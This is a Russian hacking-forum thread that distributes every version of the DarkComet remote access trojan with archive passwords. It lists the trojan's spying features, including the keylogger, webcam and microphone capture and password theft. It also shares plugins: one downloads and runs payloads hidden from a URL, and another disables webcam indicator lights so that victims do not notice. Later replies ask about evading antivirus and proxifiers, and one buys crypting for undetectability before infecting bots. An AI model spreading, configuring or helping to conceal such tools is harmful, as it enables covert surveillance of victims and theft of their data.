DarkComet RAT (все версии)

Тема в разделе "Трояны и шпионские программы", создана пользователем Антоха, 14 апр 2014.

↑ ↓
  1. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    03a511d35d262004fda8147439d8a2e8.
    На каждом уважающем себя форуме есть ветка с темой о "комете" или"крысе".А,тут на глаза как раз попались все версии данного творения человеческого разума.Писать о настройке ничего не буду,так как в Сети миллионы статей посвящённых этой теме.Меня удивляет,что до сих пор это одно из самых популярных средств удалённого управления компьютером,хотя постоянно появляются какие-то усовершенствованные версии подобных "крыс",но видно по стабильности все уступают оригиналу.Разработка проекта была закрыта в 2012 году.​
    Автор утилиты не хочет нести ответственность за незаконное использование его разработки.
    Администрация сайта DarkComet заявила об окончании разработки инструмента удаленного администрирования (remote administration tool, RAT), который обозначался антивирусами, как вредоносная программа. Напомним, что об инструменте стало известно после того, как его использовали в сирийском конфликте для слежки за сторонниками правительственного режима.
    Предположительно, решение автора DarkComet RAT связано с арестом разработчика инструмента для удаленного управления Blackshades RAT, который также использовался в незаконных целях.
    Сам автор RAT заявил, что на данный момент его инструмент часто используется не по назначению, а по закону, автор утилиты будет частично ответственным за злоупотребление.
    Как сообщает Symantec, в прошлом авторы подобных программ заявляли, что они являются учебными пособиями, что позволяло избегать правосудия. Однако арест автора известного ботнета Mariposa, помог разработчикам осознать, что они также нарушают закон.
    Прекращение распространения подобных DarkComet RAT инструментов, в связи с риском преследования, снизит риск попадания в открытый доступ инструментов, которые могут использоваться в неправомерных целях.
    Перечень всех функций:
    - файловый менеджер;
    - менеджер открытых окон, запущенных задач, активных процессов;
    - управление автозагрузкой и службами;
    - удаленное управление реестром, установка и удаление программ;
    - захват управления удаленной машиной по технологии VNC;
    - снятие скриншотов с удаленного экрана;
    - перехват звука с микрофона и видео со встроенных или внешних камер;
    - мониторинг нажатых клавиш — кейлоггер, не работает с кириллическими операционными системами;
    - монитор буфера обмена;
    - целый набор утилит для диагностики и работы с сетью: ping, trace, socks, сканер портов и многое другое;
    - набор утилит для мониторинга производительности и состояния системы;
    - восстановление забытых паролей к распространенным программам: браузерам, IM-клиентам, почтовым клиентам и другим;
    - весь рабочий трафик шифруется алгоритмом RC4 с 256-битным ключом;
    - программа использует бэк-коннект, то есть сама инициирует соединение с управляющей машиной;
    - так же DarkComet способен самостоятельно пробросить порты, используя uPnP;
    - возможность удаленного выключения и перезагрузки машины;
    - перечислять можно долго — функций много, и бесполезные тоже имеются.

    +bonus DarkComet-RAT Remover (Тулза от создателей DarkComet функции : находит установленный сервер на вашем компьютере и удаляет .Находит абсолютно все версии.)
    DarkComet_RAT_2.0_RC7
    DARKCOMET_RAT_2.2
    DARKCOMET_RAT_2RC4
    DARKCOMET_RAT_3
    DARKCOMET_RAT_3.1_FIX
    DARKCOMET_RAT_3.2_FWB
    DARKCOMET_RAT_4
    DARKCOMET_RAT_4.1_FIX
    DARKCOMET_RAT_4.2F
    DarkCometRAT5
    DARKCOMET_RAT_5.2_F
    DARKCOMET_RAT_5.2-2F
    DarkCometRAT531__Original
    DarkComet_RAT_Legacy
    Пасс на архивы:12345
    Официальный сайт DarkComet

     
    • Мне нравится Мне нравится x 10
  2. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    Плагины для кометы:
    Download and Execute [3 Version ]
    Author: Anonmoosekaab​
    Compatibility - DarkComet V 5.0 - 5.3.1F​
    DOCUMENTATION:​
    You can modify the content of "_DCEntryPoint" with one or more of these two included functions:​
    StartDLExecuteNormal('your direct URL here', 'drop zone here');​
    //this downloads and executes your file from a direct link and drops it to the dropzone specified, then executes it normal​
    StartDLExecuteHidden('your direct URL here', 'drop zone here');​
    //this downloads and executes your file from a direct link and drops it to the dropzone specified, then executes it hidden (no window shows)​
    Скачать (пасс:111)
    Disable Webcam Lights
    Author: Anonmoosekaab​
    Compatibility : DarkComet v 5.0 - 5.3.1F​
    1. This doesn't work for all webcams, only a few Logitech ones that I found on google that can be disabled via the registry.​
    2. This plugin requires UAC admin rights since the key being changed is stored in HKLM​
    3. It should only need to be run until the time it gains admin rights unless the users is clever and re-enables the webcam light through the registry​
    4. I am not responsible for users getting suspicious that their webcam light stops working one day for no apparent reason.​
    Scan
     
    • Мне нравится Мне нравится x 6
  3. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Интересно есть плагин, показывающий установленный антивирус на компьютере юзера?
     
  4. Vikawa Пользователь
    Vikawa
    Ответить в чате

    Первый уровень

    Регистрация:
    19.08.2015
    Сообщения:
    2
    Симпатии:
    0
    Репа:
    +0 / 0 / -0
    Приветствую! подскажите пожалуйста, можно ли сделать сервер, который бы подключался в обход программы-проксификатора? и есть ли крысы, которые могут так делать?
     
  5. QueryRow Житель форума
    QueryRow
    Ответить в чате

    Форумчанин

    Регистрация:
    29.09.2015
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Это на дельфе?
     
  6. frontesc Житель форума
    frontesc
    Ответить в чате

    Форумчанин

    Регистрация:
    05.10.2016
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Jabber:
    файлы со склейками? Есть у кого то чистая комета последней версии?
     
  7. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.178
    Симпатии:
    11.093
    Пол:
    Мужской
    Репа:
    +11.241 / 47 / -6
    Jabber:
    Skype:
    И какой ответ ты ожидаешь услышать?
    А это уже верх наглости.
     
    • Согласен(а) Согласен(а) x 1
  8. frontesc Житель форума
    frontesc
    Ответить в чате

    Форумчанин

    Регистрация:
    05.10.2016
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Jabber:
    Криптануть файл мне может кто-то за денюжку ? на 100% фуд я через маднес залью ботам
     

Поделиться этой страницей